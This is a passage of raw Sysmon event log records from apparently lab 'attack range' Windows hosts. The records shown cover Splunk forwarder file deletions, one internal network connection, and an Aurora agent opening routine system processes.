Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F8565A0E1414F575384ED71FDA542C2,SHA256=A37A88DA2DA66CBA905A1D148B081FA986A63E97E4BF3EDF5A2BC4B0E725816F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016255Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:16.395{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=83B3B3204F5FA2803E422F2628BB5F8D,SHA256=46C81BD8DA7409D602BBF40A107A346397838BF65EED3920B8BC9F36D66FBC2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016257Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:17.622{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9E47DA2ED3E6BF77498AC32AA6B338,SHA256=16A31C345868EBA3692E231902304B2BCEA58E57CEFC319E5B8C3FF2A63CA457,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:17.626{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6DFD4FC8BF1C7D20AAF3BE6A9A28E88,SHA256=B5B91A1FE3843189A69530AC89A063ED3499C8A71F0E9E2317FDA4EEF2198FDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016258Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:18.717{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B32360053A14CFF492770C33BDE065,SHA256=7D37C9A459BB8046B83C9A4F44C474A0A6B1FE9723485049EE2DFA86C8901341,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:18.733{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB9E65B17E05552F2A2B0C82EEDDE29,SHA256=01344013B8F5163983BCDC588F608291472F0BA809213956D583E8224730C88B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016259Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:19.818{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA306ECC149B04368B8EA78625217646,SHA256=9C1A97FB049AF283B0755449D00FFB5A487293056040C221AD775AFCFCCC58DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:19.843{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B02C6530C0231149DB4587231FF357A,SHA256=2D834EC47836EA423D9640B43A360E4ADFC31E985B79E6C2122F7640BB8861CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:16.686{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56288-false10.0.1.12-8000- 23542300x800000000000000016260Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:20.900{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B12E5BD2FDFBBB138FAB01922AD7BD32,SHA256=E95A999A90D603C8D15FC139DCC1D56B24C479D78FF512F776522575B3D90176,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:20.948{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=335F4771C04AF5F6DB6A44580437E9AA,SHA256=74F940121F02E10293B432C639DBFEBF4A16084CCF749F04F86AA9EA6D1534CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016261Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:21.980{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DC00F3956D4309FA4624381A98B722,SHA256=C9F03A12AD4AFAC42F2D5198306EE4EC1D4107AE24AC883C4EAC88DB50B5032D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016293Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.909{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016292Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.907{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016291Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.905{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016290Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.897{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016289Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.887{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016288Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.884{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016287Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.882{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016286Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.870{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016285Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.869{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016284Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.863{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016283Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.862{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016282Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.852{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016281Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.848{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016280Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.846{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016279Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.829{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016278Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.826{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016277Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.816{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016276Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.813{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016275Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.775{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016274Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.764{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016273Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.754{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016272Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.743{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016271Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.729{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016270Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.686{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000016269Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.663{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program 